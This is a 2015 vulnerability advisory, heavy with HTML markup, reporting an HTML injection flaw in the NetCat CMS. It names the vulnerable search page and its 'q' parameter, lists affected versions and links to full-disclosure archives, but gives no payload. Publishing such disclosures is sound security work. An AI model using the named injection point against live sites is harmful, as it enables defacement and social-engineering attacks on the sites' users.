<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: April 15, 2015</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Improper Input Validation [CWE-20]</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">OSVDB Reference: 120807</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Severity (version 2.0):</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 2.9</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: #fefdfa; line-height: 18.2000007629395px;">Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism</span><br style="background-color: #fefdfa; line-height: 18.2000007629395px;" /><span style="background-color: #fefdfa; line-height: 18.2000007629395px;">Access Complexity: Medium</span><br style="background-color: #fefdfa; line-height: 18.2000007629395px;" /><span style="background-color: #fefdfa; line-height: 18.2000007629395px;">Authentication: Not required to exploit</span><br style="background-color: #fefdfa; line-height: 18.2000007629395px;" /><span style="background-color: #fefdfa; line-height: 18.2000007629395px;">Impact Type: Allows unauthorized modification</span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Discover and Reporter: <span style="background-color: white; line-height: 18.2000007629395px;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (</span><a href="https://twitter.com/justqdjing/status/588152703639015424">@justqdjing</a><span style="background-color: white; line-height: 18.2000007629395px;">)</span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Advisory Details:</b></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) Vendor & Product Description:</b></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Vendor:</b></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product & Vulnerable Version:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & Download:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat can be downloaded from here,</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://netcat.ru/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://netcat.ru/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction Overview:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat.ru is russian local company. "NetCat designed to create an absolute majority of the types of sites: from simple "business card" with a minimum content to complex web-based systems, from corporate offices to online stores, libraries or media data - in other words, projects completely different directions and at any level of complexity. View examples of sites running on NetCat CMS can be in a special section."</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"Manage the site on the basis of NetCat can even inexperienced user, because it does not require knowledge of Internet technologies, programming and markup languages. NetCat constantly improving, adds new features. In the process of finalizing necessarily take into account the wishes of our partners and clients, as well as trends in Internet development. More than 2,000 studios and private web developers have chosen for their projects is NetCat, and in 2013 sites, successfully working on our CMS, created more than 18,000."</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat web application has a computer security bug problem. It can be exploited by HTML Injection attacks. Hypertext Markup Language (HTML) injection, also sometimes referred to as virtual defacement, is an attack on a user made possible by an injection vulnerability in a web application. When an application does not properly handle user supplied data, an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust.</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Several NetCat products 0-day vulnerabilities have been found by some other bug hunter researchers before. NetCat has patched some of them. Web Security Watch is an aggregator of security reports coming from various sources. It aims to provide a single point of tracking for all publicly disclosed security issues that matter. "Its unique tagging system enables you to see a relevant set of tags associated with each security alert for a quick overview of the affected products. What's more, you can now subscribe to an RSS feed containing the specific tags that you are interested in - you will then only receive alerts related to those tags." It has published suggestions, advisories, solutions details related to cyber security vulnerabilities.</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1)<span class="Apple-converted-space"> </span></b>The programming code flaw occurs at "/catalog/search.php?" page with "&q" parameter.</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Related Articles:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://seclists.org/fulldisclosure/2015/Apr/37"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Apr/37</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/04/15/3"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/04/15/3</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1843"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1843</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01922.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01922.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://cxsecurity.com/search/author/DESC/AND/FIND/1/10/Wang+Jing/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://cxsecurity.com/search/author/DESC/AND/FIND/1/10/Wang+Jing/</span></a></div>
